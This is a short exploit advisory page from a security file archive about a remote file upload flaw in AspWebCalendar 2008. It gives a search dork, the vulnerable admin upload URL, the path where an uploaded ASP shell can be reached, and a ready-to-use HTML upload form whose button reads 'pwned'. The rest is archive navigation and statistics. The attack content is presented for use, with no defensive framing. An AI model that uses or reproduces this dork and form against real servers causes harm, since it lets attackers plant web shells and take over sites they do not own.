aspwebcal-upload.txt

aspwebcal-upload.txt: Posted Jun 18, 2008; Authored by Alemin Krali; AspWebCalendar 2008 suffers from a remote file upload vulnerability.; tags | exploit, remote, file upload; SHA-256 | 30512f2028d4d4042386b1683e3556492d6b02e5395e4cb7f0f3a6cb4042fadd; Download | Favorite | View

aspwebcal-upload.txt

Title:AspWebCalendar 2008 Remote File Upload Vulnerability

# Discovered by : Alemin_Krali  

# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>


Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed

Top Authors In Last 30 Days

Red Hat 307 files
indoushka 123 files
Ubuntu 92 files
Gentoo 32 files
Debian 21 files
LiquidWorm 19 files
Google Security Research 8 files
malvuln 5 files
verylazytech 3 files
Seth Jenkins 3 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,144)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,634)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,102)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,937)
UNIX (9,469)
UnixWare (188)
Windows (6,784)
Other

aspwebcal-upload.txt

aspwebcal-upload.txt

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

aspwebcal-upload.txt

Share This

aspwebcal-upload.txt

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems